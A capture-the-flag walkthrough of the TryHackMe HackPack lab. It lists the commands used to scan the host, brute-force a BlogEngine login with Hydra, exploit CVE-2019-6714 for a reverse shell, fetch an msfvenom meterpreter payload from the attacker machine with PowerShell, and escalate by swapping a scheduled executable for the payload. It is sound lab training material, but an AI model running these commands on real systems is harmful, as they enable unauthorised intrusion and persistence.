HackPack – TryHackMe
CTF Challenge

click the link to show the procedure with images
HackPack (html version of my notes in Joplin)

TOOLS USED: Nmap, Burp, Hydra, Meterpreter, Winpeas and others

Target IP: 10.10.31.124

Task 1

scan the target ip:

nmap -p- -sV -sC -oN nmap-all -T4 -Pn 10.10.31.124

At this point we navigate to the open port 80 on the browser and we find the answer to the question

– Whats the name of the clown displayed on the homepage?
– pennywise

TASK 2

from the home page we check the source code and other pages and after pressing the burger menu (top right), we discover a log in page called /admin

to be shure though we run also gobuster to find any other hidden directories before moving on

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.31.124

it picked up a lot of search directories and few other but our interest stays on /admin

While gobuster was working I went on the browser and looked for “blogengine default credentials” and discover that are admin:admin.
Althogh typing those we aren’t able to log in. We will try to keep admin as the username and use hydra to look for the password.

But first we use burp to intercept the package and find the first answer

– What request type is the Windows website login form using?
– POST

Now we can use Hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.31.124 http-post-form "/Account/login.aspx:__VIEWSTATE=9il1lfwD7z3650sgscKbmxa1Kw086WYNaycWzUhOYKqAExKpRbcZyZxklwuzotjjJoI6Nfo1bcbmG8a9Fzrhnk91K6V64w08lBNCrDxV02T9xh8%2BT4sDA5f1PAFpf1R6ClLOWofti%2FmD1Znm12DPTjDj35tOo9U11eMZ%2BVY53OfEI452xh%2Bz7Z76ZyJVfi6ogep8q%2BSkBfk5CHqnGPNYkcbXQJb8iUyTYbi6kglUL%2BsHLTiZCL12KSYJtiwN0QwTmN24%2F74qhO98%2BP6FSeAzAPfCnZDDrPjdXh7vOdk%2Fq%2FA%2BB6bolEAI91%2BM5XbP4v%2F2MLeu%2BdcSENrZoTR8q1LDaj2xFCt3HIefni4%2FMAug%2F45%2BTgp8&__EVENTVALIDATION=WAoBqw2g1eK49jrQPzW2%2FIe8WGlB%2FBc%2FIs8%2BO9rpQ30OPjEgc7Z0w4Q%2FY6vOmxyexmPXwfJ7xfDDNiU1twBWJYNnI2UQIYeaGxrhnk3Ic%2BM4wgp3ty%2F%2Fgp7zsZLnJpRiUpe%2BGStLBkNJtQVz6C%2B8byrJV98%2FDcld%2BeWApW6kEk1n0EzV&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

– Guess a username, choose a password word-list and gain credentials to a user account!
– 1qaz2wsx

TASK 3

Now that we have access, we look to vulnerabilities that can be exploited, ON the about page we find the version of BlogEngine

– Now you have logged into the website, are you able to identify the version of the BlogEngine?
– 3.3.6.0

Now we use searchsploit (or a webbased one) to look for an exploit and copy it in our folder

searchsploit BlogEngine.net 3.3.6
searchsploit -m exploit/aspx/webapps/46353.cs

– What is the CVE?
– CVE-2019-6714

Open with nano the file, read the instruction and change the IP address with yours and you can also change the port

As we were told in the instruction file, copy it as PostView.ascx and start listening

nc -nlvp 6576

now we go on the webpage, post –> new post and upload the file

Once we do that we keep following the instructions and navigate to http://10.10.31.124/?theme=../../App_Data/files and we get the shell

– Who is the webserver running as?
– iis apppool\blog

TASK 4

note: the target ip address changed to 10.10.252.126 as i had to restart the machine

Now we need to create a payload with meterpreter:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.x.x.x LPORT=7766 -f exe -o shell.exe

On another terminal we open a python server to upload the payload

python3 -m http.server 8888

and on the previous gained shell to download (under the windows/tmp) the payload

powershell -c "Invoke-WebRequest -Uri 'http://10.9.1.77:8888/shell.exe' -OutFile 'c:\Windows\Temp\shell.exe'"

Now execute the payload with metasploit after and adjusting the options

run payload on target machine and watch session starting

from here to check the os and type sysinfo to check the os

-What is the OS version of this windows machine?
-Windows 2012 R2 (6.3 Build 9600)

We move to program files to replace it with a payload so we escalate

cd "c:\program files (x86)"\SystemScheduler

but if we check the Events/20198415519.INI_LOG.txt we see that Message.exe run every 30sec

Inside this folder c:\Program Files (x86)\SystemScheduler we rename message.exe to message.bak

mv Message.exe Message.bak

On our local machine, we rename the shell.exe payload to Message.exe and upload it to the target machine folder

powershell -c "Invoke-WebRequest -Uri 'http://10.9.1.77:8888/Message.exe' -OutFile 'c:\Program Files (x86)\SystemScheduler\Message.exe'"

Now will execute the payload automatically every 30 seconds and we get the shell

In Admin desktop we find root.txt

In Jeff’s desktop we find the other flag

Task 5

From the meterpreter session, we type shell to enter powershell
With the python web server running, as before, we transfer the winPEAS.bat file to the target maching

powershell -c "Invoke-WebRequest -Uri 'http://10.9.1.77:8888/winPEAS.bat' -OutFile 'c:\Windows\Temp\winPEAS.bat'"

we type .\winPEAS.bat to run winPeas and wait

Under the OS system info list, we find a line that states “Original Install Date”, and we’ve got our answer to the the last question